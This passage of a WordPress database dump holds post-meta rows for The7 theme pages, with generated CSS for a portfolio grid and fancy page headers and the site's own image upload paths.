.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1744dc4fc9a9301dff01889f665ab835.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(8420,2570,'_edit_lock','1675596336:1'),
(8421,2570,'_edit_last','1'),
(8422,2570,'_wpb_vc_js_status','true'),
(8423,2570,'_dt_sidebar_position','disabled'),
(8424,2570,'_dt_sidebar_widgetarea_id','sidebar_1'),
(8425,2570,'_dt_sidebar_hide_on_mobile','0'),
(8426,2570,'_dt_footer_show','1'),
(8427,2570,'_dt_footer_widgetarea_id','sidebar_2'),
(8428,2570,'_dt_footer_hide_on_mobile','0'),
(8429,2570,'_dt_header_title','fancy'),
(8430,2570,'_dt_header_background','normal'),
(8431,2570,'_dt_header_background_below_slideshow','disabled'),
(8432,2570,'_dt_header_transparent_bg_color_scheme','light'),
(8433,2570,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(8434,2570,'_dt_header_transparent_top_bar_bg_opacity','25'),
(8435,2570,'_dt_header_transparent_bg_color','#000000'),
(8436,2570,'_dt_header_transparent_bg_opacity','50'),
(8437,2570,'_dt_header_disabled_background','normal'),
(8438,2570,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(8439,2570,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(8440,2570,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(8441,2570,'_dt_header_disabled_transparent_bg_color','#000000'),
(8442,2570,'_dt_header_disabled_transparent_bg_opacity','50'),
(8443,2570,'_dt_page_overrides_top_margin',''),
(8444,2570,'_dt_page_overrides_right_margin',''),
(8445,2570,'_dt_page_overrides_bottom_margin',''),
(8446,2570,'_dt_page_overrides_left_margin',''),
(8447,2570,'_dt_mobile_page_padding_top',''),
(8448,2570,'_dt_mobile_page_padding_right',''),
(8449,2570,'_dt_mobile_page_padding_bottom',''),
(8450,2570,'_dt_mobile_page_padding_left',''),
(8451,2570,'_dt_fancy_header_layout_heading',''),
(8452,2570,'_dt_fancy_header_title_aligment','center'),
(8453,2570,'_dt_fancy_header_height','300'),
(8454,2570,'_dt_fancy_header_padding-top','0px'),
(8455,2570,'_dt_fancy_header_padding-bottom','0px'),
(8456,2570,'_dt_fancy_header_breadcrumbs_heading',''),
(8457,2570,'_dt_fancy_header_breadcrumbs','disabled'),
(8458,2570,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(8459,2570,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(8460,2570,'_dt_fancy_header_title_heading',''),
(8461,2570,'_dt_fancy_header_title_mode','custom'),
(8462,2570,'_dt_fancy_header_title',''),
(8463,2570,'_dt_fancy_header_title_font_size','30'),
(8464,2570,'_dt_fancy_header_title_line_height','36'),
(8465,2570,'_dt_fancy_header_text_transform','none'),
(8466,2570,'_dt_fancy_header_title_color_mode','color'),
(8467,2570,'_dt_fancy_header_title_color','#ffffff'),
(8468,2570,'_dt_fancy_header_subtitle_heading',''),
(8469,2570,'_dt_fancy_header_subtitle',''),
(8470,2570,'_dt_fancy_header_subtitle_font_size','18'),
(8471,2570,'_dt_fancy_header_subtitle_line_height','26'),
(8472,2570,'_dt_fancy_header_subtitle_text_transform','none'),
(8473,2570,'_dt_fancy_header_subtitle_color_mode','color'),
(8474,2570,'_dt_fancy_header_subtitle_color','#1e73be'),
(8475,2570,'_dt_fancy_header_bg_heading',''),
(8476,2570,'_dt_fancy_header_bg_color','#222222'),
(8477,2570,'_dt_fancy_header_bg_image_origin','featured_image'),
(8478,2570,'_dt_fancy_header_bg_image','a:0:{}'),
(8479,2570,'_dt_fancy_header_bg_repeat','no-repeat'),
(8480,2570,'_dt_fancy_header_bg_position_x','center'),
(8481,2570,'_dt_fancy_header_bg_position_y','center'),
(8482,2570,'_dt_fancy_header_bg_fullscreen','1'),
(8483,2570,'_dt_fancy_header_bg_overlay','0'),
(8484,2570,'_dt_fancy_header_overlay_color','#000'),
(8485,2570,'_dt_fancy_header_bg_overlay_opacity','50'),
(8486,2570,'_dt_fancy_header_scroll_effect','default'),
(8487,2570,'_dt_fancy_header_bg_parallax','0.5'),
(8488,2570,'_dt_fancy_header_responsiveness_heading',''),
(8489,2570,'_dt_fancy_header_responsiveness','enabled'),
(8490,2570,'_dt_fancy_header_responsiveness_switch','778px'),
(8491,2570,'_dt_fancy_header_responsive_height','70'),
(8492,2570,'_dt_fancy_header_responsive_font_size','30'),
(8493,2570,'_dt_fancy_header_responsive_title_line_height','38'),
(8494,2570,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(8495,2570,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(8496,2570,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(8497,2570,'_dt_project_options_back_button',''),
(8498,2570,'_dt_project_options_show_link','0'),
(8499,2570,'_dt_project_options_link',''),
(8500,2570,'_dt_project_options_link_target',''),
(8501,2570,'_dt_project_options_link_name',''),
(8502,2570,'_dt_project_options_hide_thumbnail','1'),
(8503,2570,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(8504,2570,'_dt_project_options_related_mode','same'),
(8505,2570,'_dt_project_options_preview','normal'),
(8506,2570,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/mws2.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #1e73be;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(8507,2572,'_edit_lock','1675596338:1'),
(8508,2572,'_edit_last','1'),
(8509,2572,'_wpb_vc_js_status','true'),
(8510,2572,'_dt_sidebar_position','disabled'),
(8511,2572,'_dt_sidebar_widgetarea_id','sidebar_1'),
(8512,2572,'_dt_sidebar_hide_on_mobile','0'),
(8513,2572,'_dt_footer_show','1'),
(8514,2572,'_dt_footer_widgetarea_id','sidebar_2'),
(8515,2572,'_dt_footer_hide_on_mobile','0'),
(8516,2572,'_dt_header_title','fancy'),
(8517,2572,'_dt_header_background','normal'),
(8518,2572,'_dt_header_background_below_slideshow','disabled'),
(8519,2572,'_dt_header_transparent_bg_color_scheme','light'),
(8520,2572,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(8521,2572,'_dt_header_transparent_top_bar_bg_opacity','25'),
(8522,2572,'_dt_header_transparent_bg_color','#000000'),
(8523,2572,'_dt_header_transparent_bg_opacity','50'),
(8524,2572,'_dt_header_disabled_background','normal'),
(8525,2572,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(8526,2572,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(8527,2572,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(8528,2572,'_dt_header_disabled_transparent_bg_color','#000000'),
(8529,2572,'_dt_header_disabled_transparent_bg_opacity','50'),
(8530,2572,'_dt_page_overrides_top_margin',''),
(8531,2572,'_dt_page_overrides_right_margin',''),
(8532,2572,'_dt_page_overrides_bottom_margin',''),
(8533,2572,'_dt_page_overrides_left_margin',''),
(8534,2572,'_dt_mobile_page_padding_top',''),
(8535,2572,'_dt_mobile_page_padding_right',''),
(8536,2572,'_dt_mobile_page_padding_bottom',''),
(8537,2572,'_dt_mobile_page_padding_left',''),
(8538,2572,'_dt_fancy_header_layout_heading',''),
(8539,2572,'_dt_fancy_header_title_aligment','center'),
(8540,2572,'_dt_fancy_header_height','300'),
(8541,2572,'_dt_fancy_header_padding-top','0px'),
(8542,2572,'_dt_fancy_header_padding-bottom','0px'),
(8543,2572,'_dt_fancy_header_breadcrumbs_heading',''),
(8544,2572,'_dt_fancy_header_breadcrumbs','disabled'),
(8545,2572,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(8546,2572,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(8547,2572,'_dt_fancy_header_title_heading',''),
(8548,2572,'_dt_fancy_header_title_mode','custom'),
(8549,2572,'_dt_fancy_header_title',''),
(8550,2572,'_dt_fancy_header_title_font_size','30'),
(8551,2572,'_dt_fancy_header_title_line_height','36'),
(8552,2572,'_dt_fancy_header_text_transform','none'),
(8553,2572,'_dt_fancy_header_title_color_mode','color'),
(8554,2572,'_dt_fancy_header_title_color','#ffffff'),
(8555,2572,'_dt_fancy_header_subtitle_heading',''),
(8556,2572,'_dt_fancy_header_subtitle',''),
(8557,2572,'_dt_fancy_header_subtitle_font_size','18'),
(8558,2572,'_dt_fancy_header_subtitle_line_height','26'),
(8559,2572,'_dt_fancy_header_subtitle_text_transform','none'),
(8560,2572,'_dt_fancy_header_subtitle_color_mode','color'),
(8561,2572,'_dt_fancy_header_subtitle_color','#ffffff'),
(8562,2572,'_dt_fancy_header_bg_heading',''),
(8563,2572,'_dt_fancy_header_bg_color','#222222'),
(8564,2572,'_dt_fancy_header_bg_image_origin','featured_image'),
(8565,2572,'_dt_fancy_header_bg_image','a:0:{}'),
(8566,2572,'_dt_fancy_header_bg_repeat','no-repeat'),
(8567,2572,'_dt_fancy_header_bg_position_x','center'),
(8568,2572,'_dt_fancy_header_bg_position_y','center'),
(8569,2572,'_dt_fancy_header_bg_fullscreen','1'),
(8570,2572,'_dt_fancy_header_bg_overlay','0'),
(8571,2572,'_dt_fancy_header_overlay_color','#000'),
(8572,2572,'_dt_fancy_header_bg_overlay_opacity','50'),
(8573,2572,'_dt_fancy_header_scroll_effect','default'),
(8574,2572,'_dt_fancy_header_bg_parallax','0.5'),
(8575,2572,'_dt_fancy_header_responsiveness_heading',''),
(8576,2572,'_dt_fancy_header_responsiveness','enabled'),
(8577,2572,'_dt_fancy_header_responsiveness_switch','778px'),
(8578,2572,'_dt_fancy_header_responsive_height','70'),
(8579,2572,'_dt_fancy_header_responsive_font_size','30'),
(8580,2572,'_dt_fancy_header_responsive_title_line_height','38'),
(8581,2572,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(8582,2572,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(8583,2572,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(8584,2572,'_dt_project_options_back_button',''),
(8585,2572,'_dt_project_options_show_link',''),
(8586,2572,'_dt_project_options_link',''),
(8587,2572,'_dt_project_options_link_target',''),
(8588,2572,'_dt_project_options_link_name',''),
(8589,2572,'_dt_project_options_hide_thumbnail','1'),
(8590,2572,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(8591,2572,'_dt_project_options_related_mode','same'),
(8592,2572,'_dt_project_options_preview','normal'),
(8593,2572,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/mws4.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(8594,2574,'_edit_lock','1675595834:1'),
(8595,2575,'_wp_attached_file','2022/10/mws5.jpg'),
